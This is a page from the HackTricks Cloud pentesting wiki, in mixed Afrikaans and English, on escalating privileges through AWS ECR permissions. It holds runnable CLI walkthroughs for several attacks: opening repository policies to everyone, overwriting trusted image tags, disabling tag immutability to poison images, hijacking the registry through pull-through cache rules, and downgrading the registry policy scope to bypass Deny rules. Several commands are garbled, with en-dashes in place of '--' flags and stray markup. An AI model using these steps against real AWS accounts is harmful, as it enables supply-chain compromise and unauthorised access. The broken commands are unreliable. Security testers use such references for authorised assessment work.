AWS - ECR Privesc

Tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

Kyk na die subscription plans!

Sluit aan by die 💬 Discord group of die telegram group of volg ons op Twitter 🐦 @hacktricks_live.

Deel hacking tricks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.

ECR

`ecr:GetAuthorizationToken`,`ecr:BatchGetImage`

An attacker with the ecr:GetAuthorizationToken and ecr:BatchGetImage can login to ECR and download images.

For more info on how to download images:

AWS - ECR Post Exploitation

Potensiële impak: Indirekte privesc deur sensitiewe inligting in die verkeer te onderskep.

`ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart`

An attacker with the all those permissions can login to ECR and upload images. This can be useful to escalate privileges to other environments where those images are being used.

In addition, ecr:PutImage can be used to overwrite an existing tag (for example stable / prod) by uploading a different image manifest under that tag, effectively hijacking tag-based deployments.

This becomes especially impactful when downstream consumers deploy by tag and auto-refresh on tag changes, such as:

Lambda container image functions (PackageType=Image) referencing .../repo:stable
ECS services / Kubernetes workloads pulling repo:prod (without digest pinning)
Any CI/CD that redeploys on ECR events

In those cases, a tag overwrite can lead to remote code execution in the consumer environment and privilege escalation to the IAM role used by that workload (for example, a Lambda execution role with secretsmanager:GetSecretValue).

To learn how to upload a new image/update one, check:

AWS - EKS Enum

`ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart`

Like the previous section, but for public repositories.

`ecr:SetRepositoryPolicy`

An attacker with this permission could change the repository beleid to grant himself (or even everyone) lees/skryf toegang.
For example, in this example read access is given to everyone.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

Inhoud van my-policy.json:

{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "allow public pull",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

`ecr-public:SetRepositoryPolicy`

Soos die vorige afdeling, maar vir openbare repositories.
’n aanvaller kan die repository policy wysig van ’n ECR Public repository om ongemagtigde openbare toegang te verleen of hul voorregte te eskaleer.

# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json

Potensiële impak: Ongemagtigde openbare toegang tot die ECR Public repository wat enigiemand toelaat om images te push, pull of te delete.

`ecr:PutRegistryPolicy`

’n aanvaller met hierdie toestemming kan die registry policy verander om homself, sy rekening (of selfs almal) lees/skryf toegang te gee.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

ecr:CreatePullThroughCacheRule

Misbruik ECR Pull Through Cache (PTC)-reëls om ’n deur die aanvaller beheerste upstream-naamruimte aan ’n vertroude private ECR-voorvoegsel te koppel. Dit laat workloads wat vanaf die private ECR pull, deursigtig aanvaller-images ontvang sonder om enige push na die private ECR te doen.

Benodigde perms: ecr:CreatePullThroughCacheRule, ecr:DescribePullThroughCacheRules, ecr:DeletePullThroughCacheRule. Indien ’n ECR Public upstream gebruik word: ecr-public:* om te create/push na die publieke repo.
Getoets upstream: public.ecr.aws

Stappe (voorbeeld):

Berei ’n aanvaller-image voor in ECR Public

Get your ECR Public alias with: aws ecr-public describe-registries –region us-east-1

docker login public.ecr.aws/<public_alias> docker build -t public.ecr.aws/<public_alias>/hacktricks-ptc-demo:ptc-test . docker push public.ecr.aws/<public_alias>/hacktricks-ptc-demo:ptc-test

Skep die PTC-reël in die private ECR om ’n vertroude voorvoegsel na die publieke register te koppel aws ecr create-pull-through-cache-rule –region us-east-2 –ecr-repository-prefix ptc –upstream-registry-url public.ecr.aws
Pull die aanvaller-image via die private ECR-pad (geen push na die private ECR is uitgevoer nie) docker login <account_id>.dkr.ecr.us-east-2.amazonaws.com docker pull <account_id>.dkr.ecr.us-east-2.amazonaws.com/ptc/<public_alias>/hacktricks-ptc-demo:ptc-test docker run –rm <account_id>.dkr.ecr.us-east-2.amazonaws.com/ptc/<public_alias>/hacktricks-ptc-demo:ptc-test

Potensiële impak: Voorsieningskettingkompromittering deur interne image-name onder die gekose voorvoegsel te kaap. Enige workload wat images vanaf die private ECR met daardie voorvoegsel pull, sal deur die aanvaller beheerste inhoud ontvang.

`ecr:PutImageTagMutability`

Misbruik hierdie permissie om ’n repository met tag-immutability na mutabel te omskep en vertroude tags (bv. latest, stable, prod) met deur die aanvaller beheerste inhoud te oorskryf.

Benodigde perms: ecr:PutImageTagMutability plus push-vermoëns (ecr:GetAuthorizationToken, ecr:InitiateLayerUpload, ecr:UploadLayerPart, ecr:CompleteLayerUpload, ecr:PutImage).
Impak: Voorsieningskettingkompromittering deur stilweg onveranderlike tags te vervang sonder om tag-name te verander.

Stappe (voorbeeld):

Vergiftig 'n onveranderlike tag deur die mutability om te skakel

```bash REGION=us-east-1 REPO=ht-immutable-demo-$RANDOM aws ecr create-repository --region $REGION --repository-name $REPO --image-tag-mutability IMMUTABLE acct=$(aws sts get-caller-identity --query Account --output text) aws ecr get-login-password --region $REGION | docker login --username AWS --password-stdin ${acct}.dkr.ecr.${REGION}.amazonaws.com # Build and push initial trusted tag printf 'FROM alpine:3.19\nCMD echo V1\n' > Dockerfile && docker build -t ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod . && docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod # Attempt overwrite while IMMUTABLE (should fail) printf 'FROM alpine:3.19\nCMD echo V2\n' > Dockerfile && docker build -t ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod . && docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod # Flip to MUTABLE and overwrite aws ecr put-image-tag-mutability --region $REGION --repository-name $REPO --image-tag-mutability MUTABLE docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod # Validate consumers pulling by tag now get the poisoned image (prints V2) docker run --rm ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod ```

Globale registrasiekaping via ROOT Pull-Through Cache reël

Skep ’n Pull-Through Cache (PTC) reël wat die spesiale ecrRepositoryPrefix=ROOT gebruik om die wortel van die private ECR-register na ’n upstream publieke register (bv., ECR Public) te karteer. Enige pull na ’n nie-bestaande repository in die private register sal deursigtig vanaf upstream bedien word, wat supply-chain hijacking moontlik maak sonder om na private ECR te push.

Benodigde perms: ecr:CreatePullThroughCacheRule, ecr:DescribePullThroughCacheRules, ecr:DeletePullThroughCacheRule, ecr:GetAuthorizationToken.
Impak: Pulls na <account>.dkr.ecr.<region>.amazonaws.com/<any-existing-upstream-path>:<tag> slaag en skep outomaties private repos wat vanaf upstream gekom het.

Nota: Vir ROOT-reëls, laat --upstream-repository-prefix uit. Om dit te verskaf sal ’n validasiefout veroorsaak.

Demo (us-east-1, upstream public.ecr.aws)

```bash REGION=us-east-1 ACCT=$(aws sts get-caller-identity --query Account --output text)

1) Create ROOT PTC rule mapping to ECR Public (no upstream prefix)

aws ecr create-pull-through-cache-rule
–region “$REGION”
–ecr-repository-prefix ROOT
–upstream-registry-url public.ecr.aws

2) Authenticate to private ECR and pull via root path (triggers caching & auto repo creation)

aws ecr get-login-password –region “$REGION” | docker login –username AWS –password-stdin ${ACCT}.dkr.ecr.${REGION}.amazonaws.com

Example using an official mirror path hosted in ECR Public

(public.ecr.aws/docker/library/alpine:latest)

docker pull ${ACCT}.dkr.ecr.${REGION}.amazonaws.com/docker/library/alpine:latest

3) Verify repo and image now exist without any push

aws ecr describe-repositories –region “$REGION”
–query “repositories[?repositoryName==docker/library/alpine]” aws ecr list-images –region “$REGION” –repository-name docker/library/alpine –filter tagStatus=TAGGED

4) Cleanup

aws ecr delete-pull-through-cache-rule –region “$REGION” –ecr-repository-prefix ROOT aws ecr delete-repository –region “$REGION” –repository-name docker/library/alpine –force || true

</details>

### `ecr:PutAccountSetting` (Downgrade `REGISTRY_POLICY_SCOPE` to bypass registry policy denies)

Misbruik `ecr:PutAccountSetting` om die omvang van die registry‑beleid te wissel van `V2` (beleid wat op alle ECR‑aksies toegepas word) na `V1` (beleid wat slegs op `CreateRepository`, `ReplicateImage`, `BatchImportUpstreamImage` toegepas word). As 'n beperkende registry policy Deny aksies soos `CreatePullThroughCacheRule` blokkeer, verwyder 'n afgradering na `V1` daardie afdwinging sodat identity‑policy Allows in werking tree.

- Benodigde perms: `ecr:PutAccountSetting`, `ecr:PutRegistryPolicy`, `ecr:GetRegistryPolicy`, `ecr:CreatePullThroughCacheRule`, `ecr:DescribePullThroughCacheRules`, `ecr:DeletePullThroughCacheRule`.
- Impact: Vermoë om ECR‑aksies uit te voer wat voorheen deur 'n registry policy Deny geblokkeer is (bv. skep PTC‑reëls) deur tydelik die scope op `V1` te stel.

Stappe (voorbeeld):

<details>
<summary>Bypass registry policy Deny on CreatePullThroughCacheRule by switching to V1</summary>
```bash
REGION=us-east-1
ACCT=$(aws sts get-caller-identity --query Account --output text)

# 0) Snapshot current scope/policy (for restore)
aws ecr get-account-setting --name REGISTRY_POLICY_SCOPE --region $REGION || true
aws ecr get-registry-policy --region $REGION > /tmp/orig-registry-policy.json 2>/dev/null || echo '{}' > /tmp/orig-registry-policy.json

# 1) Ensure V2 and set a registry policy Deny for CreatePullThroughCacheRule
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V2 --region $REGION
cat > /tmp/deny-ptc.json <<'JSON'
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "DenyPTCAll",
"Effect": "Deny",
"Principal": "*",
"Action": ["ecr:CreatePullThroughCacheRule"],
"Resource": "*"
}
]
}
JSON
aws ecr put-registry-policy --policy-text file:///tmp/deny-ptc.json --region $REGION

# 2) Attempt to create a PTC rule (should FAIL under V2 due to Deny)
set +e
aws ecr create-pull-through-cache-rule \
--region $REGION \
--ecr-repository-prefix ptc-deny-test \
--upstream-registry-url public.ecr.aws
RC=$?
set -e
if [ "$RC" -eq 0 ]; then echo "UNEXPECTED: rule creation succeeded under V2 deny"; fi

# 3) Downgrade scope to V1 and retry (should SUCCEED now)
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V1 --region $REGION
aws ecr create-pull-through-cache-rule \
--region $REGION \
--ecr-repository-prefix ptc-deny-test \
--upstream-registry-url public.ecr.aws

# 4) Verify rule exists
aws ecr describe-pull-through-cache-rules --region $REGION \
--query "pullThroughCacheRules[?ecrRepositoryPrefix=='ptc-deny-test']"

# 5) Cleanup and restore
aws ecr delete-pull-through-cache-rule --region $REGION --ecr-repository-prefix ptc-deny-test || true
if jq -e '.registryPolicyText' /tmp/orig-registry-policy.json >/dev/null 2>&1; then
jq -r '.registryPolicyText' /tmp/orig-registry-policy.json > /tmp/_orig.txt
aws ecr put-registry-policy --region $REGION --policy-text file:///tmp/_orig.txt
else
aws ecr delete-registry-policy --region $REGION || true
fi
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V2 --region $REGION

Tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

Kyk na die subscription plans!

Sluit aan by die 💬 Discord group of die telegram group of volg ons op Twitter 🐦 @hacktricks_live.

Deel hacking tricks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.